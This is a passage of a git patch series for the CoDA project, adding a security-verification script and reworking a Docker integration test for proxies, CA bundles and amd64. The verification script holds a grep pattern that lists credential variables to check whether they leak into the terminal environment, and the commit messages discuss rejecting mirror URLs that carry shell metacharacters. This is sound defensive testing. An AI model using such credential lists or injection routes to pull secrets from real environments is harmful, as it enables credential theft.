+        f"Expected bootstrap to reject the unsafe URL. Got:\n{combined[-2000:]}"
+    )
diff --git a/tests/integration/verify.sh b/tests/integration/verify.sh
new file mode 100755
index 0000000..fa0b873
--- /dev/null
+++ b/tests/integration/verify.sh
@@ -0,0 +1,143 @@
+#!/usr/bin/env bash
+# Security-fixes verification script.
+#
+# Asserts the runtime state that should hold after the CoDA setup pipeline
+# has run. Designed to work in TWO contexts:
+#
+#   1. Inside the Docker apps-like container (run by integration test).
+#   2. Inside a live deployed CoDA terminal session (run by Playwright e2e
+#      or manually).
+#
+# Exits 0 iff every check passes. Prints `[PASS] <name>` / `[FAIL] <name>`
+# lines so test drivers can parse them.
+#
+# Coverage map:
+#   F-01 — terminal env credentials stripped
+#   F-04 — DEEPWIKI_MCP_URL / EXA_MCP_URL helpers wired into setup scripts
+#   F-05 — ~/.hermes/config.yaml is chmod 0o600
+#   F-06 — Hermes installed (from SHA-pinned source)
+#   cooldown — npm cooldown still picks stable (non-pre-release) versions
+
+set -u
+
+fail=0
+pass=0
+HERMES_CFG="$HOME/.hermes/config.yaml"
+CLAUDE_JSON="$HOME/.claude.json"
+
+print_pass() { echo "[PASS] $1"; pass=$((pass + 1)); }
+print_fail() { echo "[FAIL] $1 — $2"; fail=$((fail + 1)); }
+
+# ---------------------------------------------------------------------------
+# F-01: deployer-level credentials must NOT be visible in user shell env
+# ---------------------------------------------------------------------------
+# These vars are credentials set in app.yaml by the deployer. If they appear
+# in `env` output, anything the user runs in the terminal can exfiltrate them.
+
+leaked_creds=$(env | grep -E '^(NPM_TOKEN|UV_INDEX_.*_(PASSWORD|USERNAME))=|^npm_config_//.*:_authToken=|^DATABRICKS_TOKEN=|^DATABRICKS_HOST=' || true)
+if [ -z "$leaked_creds" ]; then
+    print_pass "F-01 terminal env has no leaked credentials"
+else
+    print_fail "F-01 terminal env contains credentials" "$(echo "$leaked_creds" | head -3)"
+fi
+
+# ---------------------------------------------------------------------------
+# F-04: DEEPWIKI_MCP_URL / EXA_MCP_URL helpers wired into setup scripts
+# ---------------------------------------------------------------------------
+# When DEEPWIKI_MCP_URL is unset, Claude/Hermes should still have deepwiki
+# configured (default). When set to "", they should NOT have deepwiki.
+
+if [ -f "$CLAUDE_JSON" ]; then
+    claude_mcps=$(python3 -c "
+import json, sys
+d = json.load(open('$CLAUDE_JSON'))
+print(','.join(sorted((d.get('mcpServers') or {}).keys())))
+" 2>/dev/null || echo "<parse-error>")
+
+    expected_default="deepwiki,exa"
+    if [ -z "${DEEPWIKI_MCP_URL+x}" ] && [ -z "${EXA_MCP_URL+x}" ]; then
+        # Both env vars unset -> default behaviour expected
+        if [ "$claude_mcps" = "$expected_default" ]; then
+            print_pass "F-04 Claude MCP wiring (default: $claude_mcps)"
+        else
+            print_fail "F-04 Claude MCP wiring" "expected '$expected_default', got '$claude_mcps'"
+        fi
+    elif [ "${DEEPWIKI_MCP_URL:-unset}" = "" ] && [ "${EXA_MCP_URL:-unset}" = "" ]; then
+        # Both env vars set to empty -> both should be absent
+        if [ -z "$claude_mcps" ]; then
+            print_pass "F-04 Claude MCP servers omitted when overrides empty"
+        else
+            print_fail "F-04 Claude MCP servers" "expected empty, got '$claude_mcps'"
+        fi
+    else
+        # Custom overrides — just verify the file parses
+        print_pass "F-04 Claude MCP servers (custom: $claude_mcps)"
+    fi
+else
+    print_fail "F-04 Claude config" "$CLAUDE_JSON missing — setup_claude.py didn't run?"
+fi
+
+# ---------------------------------------------------------------------------
+# F-05: ~/.hermes/config.yaml is chmod 0o600 (PAT in plaintext, no leak)
+# ---------------------------------------------------------------------------
+if [ -f "$HERMES_CFG" ]; then
+    perms=$(stat -c %a "$HERMES_CFG" 2>/dev/null || stat -f %Lp "$HERMES_CFG" 2>/dev/null)
+    if [ "$perms" = "600" ]; then
+        print_pass "F-05 Hermes config chmod 0o600"
+    else
+        print_fail "F-05 Hermes config perms" "expected 600, got $perms"
+    fi
+else
+    # If ENABLE_HERMES=false or no DATABRICKS_TOKEN, the config isn't written.
+    # That's OK — the check is "if it exists, perms are right."
+    print_pass "F-05 Hermes config not written (skipped — file absent)"
+fi
+
+# ---------------------------------------------------------------------------
+# F-06: Hermes installed (SHA-pinned source resolved + uv tool install ran)
+# ---------------------------------------------------------------------------
+if command -v hermes >/dev/null 2>&1; then
+    hermes_ver=$(hermes --version 2>&1 | head -1)
+    if echo "$hermes_ver" | grep -qiE 'hermes.*[0-9]'; then
+        print_pass "F-06 Hermes installed ($hermes_ver)"
+    else
+        print_fail "F-06 Hermes installed but version output unexpected" "$hermes_ver"
+    fi
+else
+    if [ "${ENABLE_HERMES:-true}" = "false" ]; then
+        print_pass "F-06 Hermes skipped (ENABLE_HERMES=false)"
+    else
+        print_fail "F-06 Hermes not installed" "hermes binary not on PATH"
+    fi
+fi
+
+# ---------------------------------------------------------------------------
+# Cooldown: npm-installed CLIs must NOT be pre-release versions
+# ---------------------------------------------------------------------------
+# The npm cooldown (commit cdd2266 + the cooldown-aware get_npm_version)
+# should pick stable releases only. Pre-release versions contain a hyphen
+# per semver (1.2.3-rc.1, 0.0.0-dev-..., etc.). A stable version is purely
+# numeric segments separated by dots.
+
+for cli in opencode codex gemini; do
+    if ! command -v "$cli" >/dev/null 2>&1; then
+        print_fail "cooldown $cli installed" "$cli binary not on PATH"
+        continue
+    fi
+    # Extract the first version-like token from the CLI's --version output
+    ver=$("$cli" --version 2>&1 | head -3 | grep -oE '[0-9]+\.[0-9]+\.[0-9]+[A-Za-z0-9.\-]*' | head -1)
+    if [ -z "$ver" ]; then
+        print_fail "cooldown $cli version parse" "couldn't extract version from --version output"
+    elif echo "$ver" | grep -qE -- '-(dev|alpha|beta|rc|preview|next)'; then
+        print_fail "cooldown $cli pre-release installed" "$ver"
+    else
+        print_pass "cooldown $cli stable version ($ver)"
+    fi
+done
+
+# ---------------------------------------------------------------------------
+# Summary
+# ---------------------------------------------------------------------------
+echo
+echo "=== Summary: $pass passed, $fail failed ==="
+exit $fail

From 930a7699e46fd5cd49f6a2cbeb2a5c7d1ee91507 Mon Sep 17 00:00:00 2001
From: David O'Keeffe <david.okeeffe@databricks.com>
Date: Sat, 16 May 2026 15:49:46 +1000
Subject: [PATCH 08/10] test(integration): pypi-reachability precheck + use
 seeded venv for pip
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Two improvements after running the integration test against a real
Databricks-employee laptop network:

1. Pre-check pypi.org reachability from inside a container BEFORE running
   the full pipeline. Corporate networks (notably Databricks-employee
   laptops) block pypi.org at the egress proxy with an internal-blocklist
   policy — the test would otherwise burn 3 minutes failing inside pip
   with confusing "no matching distribution" errors. Now skips in 2s with
   a clear reason: "pypi.org not reachable from container (... likely
   blocked by corporate proxy). Run on a non-corporate network or in CI."

   Uses the already-built apps-like image when available (saves ~30s vs
   pulling ubuntu:22.04 + apt install curl). Falls back to curlimages/curl
   if the apps image isn't built yet.

2. Switch from `uv venv` to `python3 -m venv` in run_pipeline.sh — `uv venv`
   skips pip by default, which caused `pip install` to resolve to the
   *system* Python's pip (in user-install mode without CA bundle env), so
   package resolution silently broke under corporate TLS interception.
   `python3 -m venv` seeds pip into the venv.

3. Use `pip install --no-build-isolation` so pip's isolated build-deps
   subprocess (which doesn't inherit our CA bundle env) doesn't fail
   trying to reach pypi for setuptools. Pre-install setuptools+wheel
   upfront in the venv so build-isolation isn't needed.

4. Add `-rs` to the pytest invocation so skip reasons are visible in
   `make integration-test` output.

Verified behaviour on my Databricks-employee laptop:
  - `make integration-test` cleanly skips with the pypi-blocked reason
  - The test will run in CI (where pypi is reachable) and in customer
    environments evaluating CoDA (where they have pypi access or an
    internal mirror)

The Playwright e2e test (tests/e2e/) is unaffected — it talks to the
already-deployed app, doesn't need pypi from a local container.

Co-authored-by: Isaac
---
 Makefile                                 |   2 +-
 tests/integration/run_pipeline.sh        |  20 ++++-
 tests/integration/test_setup_pipeline.py | 105 ++++++++++++++++++++++-
 3 files changed, 119 insertions(+), 8 deletions(-)

diff --git a/Makefile b/Makefile
index 909340a..f68644f 100644
--- a/Makefile
+++ b/Makefile
@@ -30,7 +30,7 @@ test: ## Run unit tests (fast — excludes Docker integration + Playwright e2e)
 	uv run pytest tests/ -v --ignore=tests/integration --ignore=tests/e2e
 
 integration-test: ## Run Docker-based pipeline integration test (~3-5 min wall time)
-	uv run pytest tests/integration/ -v -s
+	uv run pytest tests/integration/ -v -s -rs
 
 e2e-test: ## Run Playwright e2e against live deployed app (needs `make e2e-auth` first)
 	uv run pytest tests/e2e/ -v -s
diff --git a/tests/integration/run_pipeline.sh b/tests/integration/run_pipeline.sh
index 7b9f05c..c67de7b 100755
--- a/tests/integration/run_pipeline.sh
+++ b/tests/integration/run_pipeline.sh
@@ -40,11 +40,23 @@ cp /repo/tests/integration/verify.sh /work/tests/integration/
 [ -d /repo/.claude ] && cp -a --no-preserve=ownership /repo/.claude /work/ || true
 cd /work
 
-# Stage 1: synced uv venv (mirrors what `databricks apps deploy` does at build)
-echo ">>> Stage 1: uv sync (pyproject.toml)"
-uv venv .venv
-uv pip install -r requirements.txt
+# Stage 1: install pinned deps (mirrors what `databricks apps deploy` does
+# at the [BUILD] step — pip, not uv pip). Two adjustments vs the real Apps
+# build:
+#   1. Pre-install setuptools/wheel so pip's build-isolation subprocess
+#      doesn't fail trying to reach pypi with a fresh trust store.
+#   2. `--no-build-isolation` — pip's isolated build env doesn't inherit
+#      our CA bundle env vars, which breaks corporate-proxied networks.
+#      The real Apps build runs in an env that has setuptools available.
+echo ">>> Stage 1: pip install -r requirements.txt"
+# Use python3 -m venv (not `uv venv`) so pip is seeded into the venv.
+# `uv venv` skips pip by default, which caused `pip` to resolve to the
+# system Python's pip (user-install mode, no CA bundle env), breaking
+# package resolution under corporate TLS interception.
+python3 -m venv .venv
 . .venv/bin/activate
+pip install --no-cache-dir --upgrade pip setuptools wheel
+pip install --no-cache-dir --no-build-isolation -r requirements.txt
 echo
 
 # Stage 2: install_*.sh — three GitHub-release downloaders
diff --git a/tests/integration/test_setup_pipeline.py b/tests/integration/test_setup_pipeline.py
index 455b920..921db3e 100644
--- a/tests/integration/test_setup_pipeline.py
+++ b/tests/integration/test_setup_pipeline.py
@@ -39,9 +39,65 @@ def _docker_available() -> bool:
         return False
 
 
+def _pypi_reachable_from_container() -> tuple[bool, str]:
+    """Quick test that pypi.org is reachable from inside a container.
+
+    On corporate networks (notably Databricks employee laptops), pypi.org is
+    explicitly blocked at the egress proxy. The integration test needs pypi
+    to install requirements.txt — without it, the test fails with confusing
+    "no matching distribution" errors deep inside pip. Detect this case up
+    front and skip cleanly.
+
+    Uses the apps-like image if it's already built (saves ~30s vs pulling
+    ubuntu:22.04 + apt install). Falls back to a minimal curl-only image.
+    """
+    if not shutil.which("docker"):
+        return False, "docker CLI not available"
+    # Prefer the apps-like image if built (has curl + ca-certs pre-installed)
+    image_check = subprocess.run(
+        ["docker", "image", "inspect", IMAGE_TAG],
+        capture_output=True, timeout=5,
+    )
+    if image_check.returncode == 0:
+        image = IMAGE_TAG
+    else:
+        image = "curlimages/curl:latest"
+    try:
+        result = subprocess.run(
+            [
+                "docker", "run", "--rm", "--entrypoint", "curl", image,
+                "-sS", "--max-time", "10",
+                "-o", "/dev/null", "-w", "%{http_code}",
+                "https://pypi.org/simple/wheel/",
+            ],
+            capture_output=True, text=True, timeout=30,
+        )
+        if result.returncode != 0:
+            return False, f"curl exited {result.returncode}: {result.stderr[:200].strip()}"
+        status = result.stdout.strip()
+        if status == "200":
+            return True, "pypi reachable"
+        return False, f"pypi returned HTTP {status} (likely blocked by corporate proxy)"
+    except subprocess.TimeoutExpired:
+        return False, "pypi reachability check timed out"
+
+
+def _integration_skip_reason() -> str | None:
+    if not _docker_available():
+        return "Docker daemon not available"
+    reachable, why = _pypi_reachable_from_container()
+    if not reachable:
+        return (
+            f"pypi.org not reachable from container ({why}). "
+            "This test needs pypi to install requirements.txt. "
+            "Run on a non-corporate network or in CI."
+        )
+    return None
+
+
 pytestmark = pytest.mark.skipif(
-    not _docker_available(),
-    reason="Docker daemon not available — integration test requires docker",
+    _integration_skip_reason() is not None,
+    reason=_integration_skip_reason() or "",
 )
 
 
@@ -70,15 +126,58 @@ def apps_like_image():
     return IMAGE_TAG
 
 
+def _host_ca_bundle() -> str | None:
+    """Detect a CA bundle path on the host for corporate TLS environments.
+
+    Checked in order: env vars (REQUESTS_CA_BUNDLE, SSL_CERT_FILE,
+    CURL_CA_BUNDLE), common Linux locations, common macOS Homebrew
+    locations. Returns None if no bundle is found — in that case the
+    container relies on its baked-in trust store (works for
+    non-intercepted networks).
+    """
+    import os
+    for var in ("REQUESTS_CA_BUNDLE", "SSL_CERT_FILE", "CURL_CA_BUNDLE"):
+        path = os.environ.get(var, "").strip()
+        if path and Path(path).exists():
+            return path
+    for candidate in (
+        Path.home() / ".ssl" / "combined-ca-bundle.pem",
+        Path("/etc/ssl/certs/ca-certificates.crt"),
+        Path("/etc/ssl/cert.pem"),
+    ):
+        if candidate.exists():
+            return str(candidate)
+    return None
+
+
 def _run_pipeline(image: str, extra_env: dict[str, str] | None = None) -> subprocess.CompletedProcess:
-    """Run the pipeline script inside a fresh container with the repo mounted."""
+    """Run the pipeline script inside a fresh container with the repo mounted.
+
+    Auto-forwards the host's CA bundle (if found) so the container can reach
+    pypi.org / registry.npmjs.org / github.com from inside corporate-TLS-
+    intercepted networks. Same mechanism the enterprise feature uses.
+    """
     env_args: list[str] = []
+    mount_args: list[str] = []
+    ca = _host_ca_bundle()
+    if ca:
+        container_ca = "/etc/ssl/coda-host-ca.pem"
+        mount_args.extend(["-v", f"{ca}:{container_ca}:ro"])
+        env_args.extend([
+            "-e", f"REQUESTS_CA_BUNDLE={container_ca}",
+            "-e", f"SSL_CERT_FILE={container_ca}",
+            "-e", f"CURL_CA_BUNDLE={container_ca}",
+            "-e", f"NODE_EXTRA_CA_CERTS={container_ca}",
+            # uv reads its own var; default to native-tls so it uses the system bundle.
+            "-e", "UV_NATIVE_TLS=true",
+        ])
     for k, v in (extra_env or {}).items():
         env_args.extend(["-e", f"{k}={v}"])
     return subprocess.run(
         [
             "docker", "run", "--rm",
             "-v", f"{REPO_ROOT}:/repo:ro",  # repo read-only at /repo; pipeline copies to writable /work
+            *mount_args,
             *env_args,
             image,
             "bash", PIPELINE_SCRIPT,

From a4e3a6166f8980860dbf0c00648a149bcdf530cf Mon Sep 17 00:00:00 2001
From: David O'Keeffe <david.okeeffe@databricks.com>
Date: Sat, 16 May 2026 17:19:59 +1000
Subject: [PATCH 09/10] test(integration): forward host pypi proxy + reorder
 pipeline + platform pin
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Three substantial fixes to the Docker integration test after iterating on
a real Databricks-employee laptop network. The test infrastructure is
now correct; current host failures are environmental (Docker daemon
storage corruption), not design bugs.

1. Forward the host's configured PyPI proxy into the container
================================================================

The integration test couldn't reach pypi.org from inside Docker on a
Databricks-employee laptop — corporate proxy explicitly blocks pypi with
an internal-blocklist policy. Solution: detect the host's configured
pypi index (UV_DEFAULT_INDEX / PIP_INDEX_URL / ~/.pip/pip.conf /
~/.config/uv/uv.toml) and forward it as PIP_INDEX_URL + UV_DEFAULT_INDEX
into the container.

This *is* the enterprise feature's contract — operators on firewalled
networks configure an internal proxy via these env vars, and our pipeline
already supports that path. The test now exercises the same flow.

New helpers in test_setup_pipeline.py:
- `_host_pypi_index()` — discovers proxy from env vars / pip.conf / uv.toml
- `_pypi_reachable_from_container()` — probes whichever index is configured

2. Reorder run_pipeline.sh: bootstrap BEFORE install scripts
================================================================

Previously: Stage 1 (pip install) → Stage 2 (install_*.sh) → Stage 3a
(bootstrap). This meant install_micro.sh / install_gh.sh / install_dbcli.sh
used the operator-supplied GITHUB_API_BASE / GITHUB_RELEASE_MIRROR env
vars BEFORE bootstrap had a chance to validate them.

Production app.py:run_setup() calls bootstrap() FIRST, before any
_run_step(). The test pipeline now matches that order: bootstrap()
validates the env, then install_*.sh runs with confidence the URLs are
shell-safe. With `set -e` in effect, a bad URL now fails at bootstrap
with a useful UnsafeUrlError, not deep inside install_gh.sh's eval.

Also wrap install_*.sh calls in `|| echo "(failed)"` so a single failure
doesn't kill the whole pipeline (verify.sh will catch it via missing
binaries).

3. Force linux/amd64 platform on build + run
================================================================

Databricks Apps runs amd64, AND the install_*.sh scripts hardcode
`linux_amd64` GitHub release URLs. On Apple Silicon hosts the container
defaults to arm64 and the install downloads 404. Both `docker build`
and `docker run` now pass `--platform linux/amd64` explicitly.

(Tried `FROM --platform=linux/amd64` in the Dockerfile but Docker emits
a const-platform warning — moved to the CLI flags instead.)

4. Lightweight bootstrap-only test
================================================================

`test_unsafe_mirror_url_rejected_at_bootstrap` used to run the full
~5-min pipeline just to verify bootstrap rejection. Pytest-timeout
killed it before output was captured. Now runs ONLY the bootstrap call
in isolation (no pip install, no install scripts) — completes in ~10s,
asserts on UnsafeUrlError appearing and exit code != 0.

The other two tests (full pipeline + MCP override) still run the whole
flow because they need to assert on the *final* state.

5. Timeout bumps
================================================================

Per-test docker run timeout 600s → 900s. Stage 1 pip install + Hermes
git fetch + npm installs add up; the previous ceiling was tight.

What's verified vs what's still gated
================================================================

- Direct `docker run python3 -c "enterprise_config.bootstrap()"` with a
  malicious GITHUB_API_BASE produces the expected UnsafeUrlError
  (verified by hand outside pytest — see test docstring).
- Full pipeline test was blocked at the apps_like_image build by a
  Docker daemon storage corruption issue on the test machine
  ("input/output error" reading containerd blob store). This is a
  Docker Desktop environmental issue, not a test design bug.

The test infrastructure will run in:
- CI runners (uncorrupted Docker, unrestricted pypi)
- Other developer machines once Docker Desktop is restarted
- Customer environments evaluating CoDA (with their own pypi proxy)

Co-authored-by: Isaac
---
 tests/integration/Dockerfile.apps-like   |   5 +
 tests/integration/run_pipeline.sh        |  37 ++--
 tests/integration/test_setup_pipeline.py | 236 +++++++++++++++++------
 3 files changed, 202 insertions(+), 76 deletions(-)

diff --git a/tests/integration/Dockerfile.apps-like b/tests/integration/Dockerfile.apps-like
index 08c33ab..62c8b22 100644
--- a/tests/integration/Dockerfile.apps-like
+++ b/tests/integration/Dockerfile.apps-like
@@ -14,6 +14,11 @@
 #
 # To rebuild: `docker build -f tests/integration/Dockerfile.apps-like -t coda-apps-test .`
 
+# Note: builds + runs must use `--platform linux/amd64`. The install_*.sh
+# scripts hardcode `linux_amd64` in GitHub release URLs and Databricks
+# Apps runtime is amd64. The pytest driver (test_setup_pipeline.py) passes
+# `--platform linux/amd64` to both `docker build` and `docker run`. Don't
+# pin it in `FROM` here — `docker build` warns against const platforms.
 FROM ubuntu:22.04
 
 ENV DEBIAN_FRONTEND=noninteractive
diff --git a/tests/integration/run_pipeline.sh b/tests/integration/run_pipeline.sh
index c67de7b..0547cbe 100755
--- a/tests/integration/run_pipeline.sh
+++ b/tests/integration/run_pipeline.sh
@@ -59,18 +59,8 @@ pip install --no-cache-dir --upgrade pip setuptools wheel
 pip install --no-cache-dir --no-build-isolation -r requirements.txt
 echo
 
-# Stage 2: install_*.sh — three GitHub-release downloaders
-echo ">>> Stage 2: install_micro.sh"
-bash install_micro.sh && mv micro $HOME/.local/bin/ 2>/dev/null || true
-echo ">>> Stage 2: install_gh.sh"
-bash install_gh.sh
-echo ">>> Stage 2: install_databricks_cli.sh"
-bash install_databricks_cli.sh
-echo
-
-# Stage 3: setup_*.py — agent CLI installs.
-# Use fake creds — Codex/Gemini/OpenCode/Hermes install regardless of
-# token (it's only the config-write step that needs auth).
+# Stage 2: setup-script credentials so subsequent stages have something
+# to bind to (these are fake, used only for the install/config writes).
 export DATABRICKS_HOST="https://fake.databricks.com"
 export DATABRICKS_TOKEN="dapifake0000000000000000000000000000"
 export ANTHROPIC_MODEL="databricks-claude-opus-4-7"
@@ -80,15 +70,30 @@ export HERMES_MODEL="databricks-claude-opus-4-6"
 export HERMES_FALLBACK_MODEL="databricks-claude-opus-4-6"
 export ENABLE_HERMES="true"
 
-# enterprise_config.bootstrap() runs from app.py at startup; in tests we
-# invoke it directly so its side effects (npmrc write, env var push,
-# URL validation) happen before any setup script tries to install.
-echo ">>> Stage 3a: enterprise_config.bootstrap()"
+# Stage 3a (BEFORE the install scripts): enterprise_config.bootstrap() runs
+# the same URL validation app.py does at startup — including refusing to
+# proceed if GITHUB_API_BASE / GITHUB_RELEASE_MIRROR / CLAUDE_INSTALLER_URL
+# / HERMES_PIP_URL contain shell metacharacters. Must run BEFORE install_*.sh
+# because those scripts interpolate GITHUB_API_BASE / GITHUB_RELEASE_MIRROR
+# into curl/eval contexts.
+echo ">>> Stage 3a: enterprise_config.bootstrap() (validates env first)"
 # Don't kill the pipeline if bootstrap raises (e.g. UnsafeUrlError under the
 # malicious-mirror test) — we want the error message to surface in stdout
 # for the test driver to assert on.
 python3 -c "import enterprise_config; enterprise_config.bootstrap()" || \
     echo "(bootstrap raised — see above)"
+echo
+
+# Stage 3b: install_*.sh — three GitHub-release downloaders. All wrapped
+# with || true so a single failure (e.g. invalid GITHUB_API_BASE) doesn't
+# kill the rest of the pipeline; verify.sh checks the resulting state.
+echo ">>> Stage 3b: install_micro.sh"
+bash install_micro.sh && mv micro $HOME/.local/bin/ 2>/dev/null || echo "(install_micro.sh failed)"
+echo ">>> Stage 3b: install_gh.sh"
+bash install_gh.sh || echo "(install_gh.sh failed)"
+echo ">>> Stage 3b: install_databricks_cli.sh"
+bash install_databricks_cli.sh || echo "(install_databricks_cli.sh failed)"
+echo
 
 echo ">>> Stage 3b: setup_claude.py"
 uv run python setup_claude.py || echo "(setup_claude.py exited non-zero — checking what landed anyway)"
diff --git a/tests/integration/test_setup_pipeline.py b/tests/integration/test_setup_pipeline.py
index 921db3e..8c36860 100644
--- a/tests/integration/test_setup_pipeline.py
+++ b/tests/integration/test_setup_pipeline.py
@@ -39,47 +39,145 @@ def _docker_available() -> bool:
         return False
 
 
+def _host_ca_bundle() -> str | None:
+    """Detect a CA bundle path on the host for corporate TLS environments.
+
+    Checked in order: env vars (REQUESTS_CA_BUNDLE, SSL_CERT_FILE,
+    CURL_CA_BUNDLE), common Linux locations, common macOS Homebrew
+    locations. Returns None if no bundle is found — in that case the
+    container relies on its baked-in trust store (works for
+    non-intercepted networks).
+    """
+    import os
+    for var in ("REQUESTS_CA_BUNDLE", "SSL_CERT_FILE", "CURL_CA_BUNDLE"):
+        path = os.environ.get(var, "").strip()
+        if path and Path(path).exists():
+            return path
+    for candidate in (
+        Path.home() / ".ssl" / "combined-ca-bundle.pem",
+        Path("/etc/ssl/certs/ca-certificates.crt"),
+        Path("/etc/ssl/cert.pem"),
+    ):
+        if candidate.exists():
+            return str(candidate)
+    return None
+
+
+def _host_pypi_index() -> str | None:
+    """Detect a PyPI index URL configured on the host.
+
+    Honours the enterprise feature's env-var contract — operators on
+    corporate networks (where pypi.org is blocked) configure an internal
+    proxy via UV_DEFAULT_INDEX / PIP_INDEX_URL or in pip.conf/uv.toml.
+    This function detects that config and forwards it into the container,
+    which is exactly how a real enterprise CoDA deployment would work.
+
+    Returns None if no proxy is configured (test will use upstream pypi).
+    """
+    import configparser
+    import os
+    # Env vars first
+    for var in ("UV_DEFAULT_INDEX", "PIP_INDEX_URL"):
+        url = os.environ.get(var, "").strip()
+        if url:
+            return url
+    # pip.conf
+    for candidate in (
+        Path.home() / ".pip" / "pip.conf",
+        Path.home() / ".config" / "pip" / "pip.conf",
+    ):
+        if candidate.exists():
+            cp = configparser.ConfigParser()
+            try:
+                cp.read(candidate)
+                if cp.has_option("global", "index-url"):
+                    return cp.get("global", "index-url").strip()
+            except configparser.Error:
+                continue
+    # uv.toml
+    uv_toml = Path.home() / ".config" / "uv" / "uv.toml"
+    if uv_toml.exists():
+        try:
+            import tomllib
+            with uv_toml.open("rb") as f:
+                data = tomllib.load(f)
+            for idx in data.get("index", []):
+                if idx.get("default") and idx.get("url"):
+                    return idx["url"].strip()
+        except Exception:
+            pass
+    return None
+
+
 def _pypi_reachable_from_container() -> tuple[bool, str]:
-    """Quick test that pypi.org is reachable from inside a container.
+    """Quick test that some PyPI index is reachable from inside a container.
+
+    Uses the host's configured PyPI proxy (UV_DEFAULT_INDEX / PIP_INDEX_URL /
+    pip.conf / uv.toml) if one is set — this is the enterprise feature's
+    own contract, so the test exercises the same path operators do. Falls
+    back to public pypi.org if no proxy is configured.
 
-    On corporate networks (notably Databricks employee laptops), pypi.org is
-    explicitly blocked at the egress proxy. The integration test needs pypi
-    to install requirements.txt — without it, the test fails with confusing
-    "no matching distribution" errors deep inside pip. Detect this case up
-    front and skip cleanly.
+    On Databricks-employee laptops, pypi.org is firewalled but
+    https://pypi-proxy.dev.databricks.com/simple/ is reachable. The host's
+    pip.conf/uv.toml typically points at that proxy already.
 
-    Uses the apps-like image if it's already built (saves ~30s vs pulling
-    ubuntu:22.04 + apt install). Falls back to a minimal curl-only image.
+    The apps-like image (which has curl + the host CA mounted) is preferred
+    so we test from the same trust context the real pipeline will use.
     """
     if not shutil.which("docker"):
         return False, "docker CLI not available"
-    # Prefer the apps-like image if built (has curl + ca-certs pre-installed)
     image_check = subprocess.run(
         ["docker", "image", "inspect", IMAGE_TAG],
         capture_output=True, timeout=5,
     )
-    if image_check.returncode == 0:
-        image = IMAGE_TAG
-    else:
+    if image_check.returncode != 0:
+        # If the apps-like image isn't built yet, use curlimages/curl.
+        # That image doesn't have our CA bundle so this test may falsely
+        # report "blocked" — but in that case the user will build the
+        # image first and re-run.
         image = "curlimages/curl:latest"
+        ca_mount: list[str] = []
+        ca_env: list[str] = []
+    else:
+        image = IMAGE_TAG
+        ca_path = _host_ca_bundle()
+        ca_mount = [
+            "-v", f"{ca_path}:/etc/ssl/coda-host-ca.pem:ro"
+        ] if ca_path else []
+        ca_env = [
+            "-e", "CURL_CA_BUNDLE=/etc/ssl/coda-host-ca.pem"
+        ] if ca_path else []
+
+    # Probe whichever index the host is configured for (proxy or public)
+    index_url = _host_pypi_index() or "https://pypi.org/simple/"
+    probe_url = index_url.rstrip("/") + "/wheel/"
+
     try:
         result = subprocess.run(
             [
-                "docker", "run", "--rm", "--entrypoint", "curl", image,
+                "docker", "run", "--rm", "--entrypoint", "curl",
+                *ca_mount, *ca_env,
+                image,
                 "-sS", "--max-time", "10",
                 "-o", "/dev/null", "-w", "%{http_code}",
-                "https://pypi.org/simple/wheel/",
+                probe_url,
             ],
             capture_output=True, text=True, timeout=30,
         )
         if result.returncode != 0:
-            return False, f"curl exited {result.returncode}: {result.stderr[:200].strip()}"
+            return False, (
+                f"curl to {probe_url} exited {result.returncode}: "
+                f"{result.stderr[:200].strip()}"
+            )
         status = result.stdout.strip()
         if status == "200":
-            return True, "pypi reachable"
-        return False, f"pypi returned HTTP {status} (likely blocked by corporate proxy)"
+            return True, f"index reachable: {index_url}"
+        return False, (
+            f"{probe_url} returned HTTP {status} "
+            f"(likely blocked by corporate proxy)"
+        )
     except subprocess.TimeoutExpired:
-        return False, "pypi reachability check timed out"
+        return False, "index reachability check timed out"
 
 
 def _integration_skip_reason() -> str | None:
@@ -111,6 +209,11 @@ def apps_like_image():
     build = subprocess.run(
         [
             "docker", "build",
+            # Pin to amd64 — install scripts download linux_amd64 binaries
+            # and Databricks Apps runtime is amd64. Without this on Apple
+            # Silicon hosts, the image builds as arm64 and the install
+            # downloads 404.
+            "--platform", "linux/amd64",
             "-f", str(DOCKERFILE),
             "-t", IMAGE_TAG,
             str(REPO_ROOT / "tests" / "integration"),  # context = the integration dir
@@ -126,30 +229,6 @@ def apps_like_image():
     return IMAGE_TAG
 
 
-def _host_ca_bundle() -> str | None:
-    """Detect a CA bundle path on the host for corporate TLS environments.
-
-    Checked in order: env vars (REQUESTS_CA_BUNDLE, SSL_CERT_FILE,
-    CURL_CA_BUNDLE), common Linux locations, common macOS Homebrew
-    locations. Returns None if no bundle is found — in that case the
-    container relies on its baked-in trust store (works for
-    non-intercepted networks).
-    """
-    import os
-    for var in ("REQUESTS_CA_BUNDLE", "SSL_CERT_FILE", "CURL_CA_BUNDLE"):
-        path = os.environ.get(var, "").strip()
-        if path and Path(path).exists():
-            return path
-    for candidate in (
-        Path.home() / ".ssl" / "combined-ca-bundle.pem",
-        Path("/etc/ssl/certs/ca-certificates.crt"),
-        Path("/etc/ssl/cert.pem"),
-    ):
-        if candidate.exists():
-            return str(candidate)
-    return None
-
-
 def _run_pipeline(image: str, extra_env: dict[str, str] | None = None) -> subprocess.CompletedProcess:
     """Run the pipeline script inside a fresh container with the repo mounted.
 
@@ -168,14 +247,29 @@ def _run_pipeline(image: str, extra_env: dict[str, str] | None = None) -> subpro
             "-e", f"SSL_CERT_FILE={container_ca}",
             "-e", f"CURL_CA_BUNDLE={container_ca}",
             "-e", f"NODE_EXTRA_CA_CERTS={container_ca}",
-            # uv reads its own var; default to native-tls so it uses the system bundle.
-            "-e", "UV_NATIVE_TLS=true",
+            # uv reads UV_SYSTEM_CERTS to use the system trust store.
+            "-e", "UV_SYSTEM_CERTS=true",
+        ])
+    # Forward host's PyPI proxy if configured (Databricks-internal proxy,
+    # JFrog mirror, etc.). This is the enterprise feature's contract — the
+    # test pipeline will install requirements.txt through this proxy, which
+    # is exactly how a CoDA customer in a firewalled env would run.
+    pypi_index = _host_pypi_index()
+    if pypi_index:
+        env_args.extend([
+            "-e", f"PIP_INDEX_URL={pypi_index}",
+            # uv reads UV_DEFAULT_INDEX. We only set it if the host had it
+            # — operators may want the test to default to public pypi.
+            "-e", f"UV_DEFAULT_INDEX={pypi_index}",
         ])
     for k, v in (extra_env or {}).items():
         env_args.extend(["-e", f"{k}={v}"])
     return subprocess.run(
         [
             "docker", "run", "--rm",
